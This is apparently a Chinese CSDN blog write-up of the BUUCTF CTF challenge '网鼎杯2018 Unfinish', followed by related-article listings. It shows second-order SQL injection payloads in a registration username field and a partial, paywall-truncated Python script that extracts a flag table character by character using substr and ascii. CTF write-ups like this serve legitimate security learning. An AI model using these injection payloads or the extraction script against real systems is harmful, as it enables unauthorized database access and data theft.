【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr

最新推荐文章于 2024-08-05 20:41:43 发布
最新推荐文章于 2024-08-05 20:41:43 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: sql注入 python脚本练习 BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/116401550
版权
本文介绍了在BUUCTF中遇到的网鼎杯2018Unfinish挑战,通过分析注册过程中的SQL注入,探讨了不用bool注入点的substr和hex二次注入方法。作者分享了使用python爬虫配合正则表达式的payload构造过程,并强调了在substr思路中非贪婪模式的重要性。同时,文章提到了hex注入的新方法,为读者展示了如何利用16进制进行二次编码注入。
摘要由CSDN通过智能技术生成

目录:

一、自己做:

测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,,
也不给我报错,,我在这里也想了一会,,想不明白

后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。

用户名:a'1 or '1

你注册成功后,他就会自动跳转到login.php的。

然后用邮箱,密码登陆成功了。 用户名为 :1 。
在这里插入图片描述

接着测试一下:

在这里插入图片描述,,直接没有变化,也就是 注册失败了。

在意料之内,这就表示 0 ,错误了,

然后进一步测试:

呃,有过滤,fuzz一下把,

用户名 : a1' or '(ascii(substr(database(),1,1))>0)

在这里插入图片描述

过滤的好像不多(至少从我的字典中看来):

这些都被过滤了。
在这里插入图片描述

二、学到的

  1. 这个 直接出 substr的数值,这个思路不需要 bool 注入点。强的一批。思路真心牛皮。
  2. 如果能够使用 substr 带出数据的话,试一下这个思路,不用bool注入点能够带出,同样,这个就不是bool注入了,是 二次注入。第二次查询。

三、 学习WP

payload的思路直接是抄袭的,侵权了联系我。

python爬虫 + re 尝试(尝试思路,):

1. substr思路:

注意,这里要带上 session,每一次注册,登陆是一次,是有记忆的。

#coding:utf-8
import requests
import re


url = 'http://4d7fce64-1ecf-41a0-a416-295a21ea6617.node3.buuoj.cn/'

m = ''
for i in range(100):
    payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
    register = {
   'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'
最低0.47元/天 解锁文章
Zero_Adam
关注
专栏目录
6-XCTF-Web-unfinish二次注入
cquptcqupt的博客
08-17 307
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽
不会编程的崽的博客
03-26 1216
网鼎杯 二次注入 盲注
网鼎杯2018-二次注入unfinish绕过
lizhiiiii的博客
03-07 484
我们可以通过转两次十六进制来得到库名(如果只转一次十六进制如果转出的十六进制中有英文字母那么英文字母后面的数字就会被截断 我们得到的就不是完整的数字)
[网鼎杯2018]Unfinish解题,五分钟带你解题
最新发布
m0_69151365的博客
08-05 658
这道题是一道很经典的二次注入题目,回顾解题过程,我们显示登录页面找不到注入,然后开始扫描目录寻找其他注入,找到register注册页面,注册完之后登录发现出现了用户名,那我们就考虑注入是不是在username,开始注入发现结果是0,所以我们就想着用转ascii码等方式来注入,很明显这种方法是正确的,然后information被过滤,我们就尝试用sys来注入表名,但是并没有成功,可能应为不是MySQL所以没有成功,官方也没有放源码出来,所以我们就猜测表名是flag,然后编写python脚本,最后解出
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
[网鼎杯2018]Unfinish
东隅的博客
10-11 789
另外,‘0’+123+'0’这样的注入进去是123,这样可以直接读到内容,这里的数字嘛,我们可以把想得到的东西进行两次hex()就好了,但是两次hex()之后注入数据库的数字变成了小数,这里可以用substr截取,而逗号被过滤了,如何不用逗号进行截取又是新的知识,学到了:substr(str from 1 for 10) 这个样子。这个跟php的弱类型差不多的,‘’+(我们的盲注)+‘’,我们盲注的结果返回1那这里username就会变成1,反之为0。注册的时候用户名这样写:(注意单引号不能漏)
网鼎杯 2018 unfinish
feng的博客
10-29 2723
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 330
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 850
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 821
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 766
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
XCTF:unfinish2018网鼎杯)(SQL二次注入
羽的博客
09-14 1140
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1158
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
网鼎杯2018:登录页面SQL注入分析
"[网鼎杯 2018]unfinish.md" 这篇描述涉及到的是一个网络安全竞赛中的CTF(Capture The Flag)挑战,特别是关于SQL注入的题目。题目中给出的场景是一个登录页面`/login.php`,并且推测有一个注册页面`/register....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值